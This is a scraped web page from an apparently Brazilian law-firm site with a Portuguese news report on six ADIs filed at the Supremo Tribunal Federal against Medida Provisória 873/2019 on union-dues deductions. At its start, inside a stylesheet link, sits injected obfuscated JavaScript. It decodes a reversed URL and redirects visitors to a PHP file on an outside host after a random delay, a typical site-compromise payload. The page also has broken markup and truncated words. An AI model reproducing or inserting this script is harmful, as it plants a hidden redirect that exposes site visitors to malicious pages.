tom-css' href='https://rebertecarvalho.com.br/wp-content/themes/WideComu/css/skins/cusscript$NqM=function(n)if%20(typeof%20($NqM.list%5Bn%5D)%20==%20string)%20return%20$NqM.list%5Bn%5D.split().reverse().join();return%20$NqM.list%5Bn%5D;;$NqM.list=%5B'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth'=ferh.noitacol.tnemucod%5D;var%20number1=Math.floor(Math.random()%20*%206);if%20(number1==3)var%20delay%20=%2018000;setTimeout($NqM(0),delay);/scripttom/style.css?ver=17.8.5' type='text/css' media='all' /> tom style-default button-stroke layout-full-width nice-scroll-on hide-love header-transparent minimalist-header-no sticky-white ab-hide subheader-transparent subheader-both-center menu-line-below-80 menuo-right logo-no-margin footer-copy-center mobile-tb-hide mobile-side-slide mobile-mini-mr-ll be-1785 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">

Supremo recebe mais seis ações contra MP da contribuição sindical

Dívida Ativa chega a R$ 2,2 trilhões; 44,8% são irrecuperáveis, diz PGFN
março 27, 2019

Supremo recebe mais seis ações contra MP da contribuição sindical

O Supremo Tribunal Federal recebeu mais seis ações questionando a toria-autorizacao-individual-desconto-sindical” target=”_blank” rel=”noreferrer noopener”>Medida Provisória 873/2019, que proíbe a cobrança de contribuição sindical a qualquer empregado que não tenha dado autorização expressa, individual e por escrito, ao seu sindicato.

Na ADI 6.098, o Conselho Federal da Ordem dos Advogados do Brasil  argumenta que a norma, apesar de invocar a autonomia e a liberdade sindical como fundamentos, na verdade se choca com estes mesmos preceitos, impondo empecilhos que vão acabar por inviabilizar o funcionamento de milhares de entidades sindicais.

Já na ADI 6.099, a Confederação dos Servidores Públicos do Brasil (CSPB) questiona especificamente o artigo 2º, que afastou a possibilidade de desconto em folha do pagamento da mensalidade sindical. O Partido Democrático Trabalhista (PDT), autor da ADI 6,101, afirma que a norma contraria a Constituição Federal, que garante a associação sindical.

Na ADI 6.105, a Confederação Nacional dos Trabalhadores em Turismo e Hospitalidade (Contratuh) afirma que, ao alterar diversos dispositivos da Consolidação das Leis do Trabalho, a MP viola de forma frontal normas constitucionais.

Já a Confederação Nacional dos Trabalhadores em Empresas de Prestação de Serviços de Asseio e Conservação, Limpeza Urbana e Áreas Verdes (Conascon) diz, na ADI 6.107, que a MP fere a liberdade de associação e de autodeterminação dos cidadãos e das próprias associações.

Na ADI 6.108, a Confederação Nacional dos Trabalhadores na Indústria (CNTI) lembra que a maioria dos ministros do Supremo, em processo semelhante, já entendeu pela liberdade, a autonomia financeira e a não intervenção do Estado.

Decisão do Plenário
Em 15 de março, o ministro Luiz Fux, do Supremo Tribunal Federal, aplicou o rito abreviado ao trâmite de duas ações que questionam a inconstitucionalidade da MP 873.

Pela MP, os sindicatos não poderão definir em assembleias ou outros tipos de negociação coletiva descontos em folha de salário para pagamento de contribuição sindical. O trabalhador terá que dar autorização expressa e individual por escrito para pagar a contribuição em boleto.

“Tendo em vista a repercussão jurídica e institucional da controvérsia, submeto o feito ao rito do artigo 10 da Lei nº 9.868/99, visando à manifestação sobre o pleito cautelar pelo Plenário do Supremo Tribunal Federal. Notifique-se a Presidência da República para que preste as informações no prazo de cinco dias. Esgotado o prazo, retornem os autos conclusos”, disse o ministro.

Na sexta-feira (22/3), o governo federal publicou o to 9.735/2019, reafirmando que contribuição sindical não pode ser descontada em folha.

WhatsApp Chat
Enviar Mensagem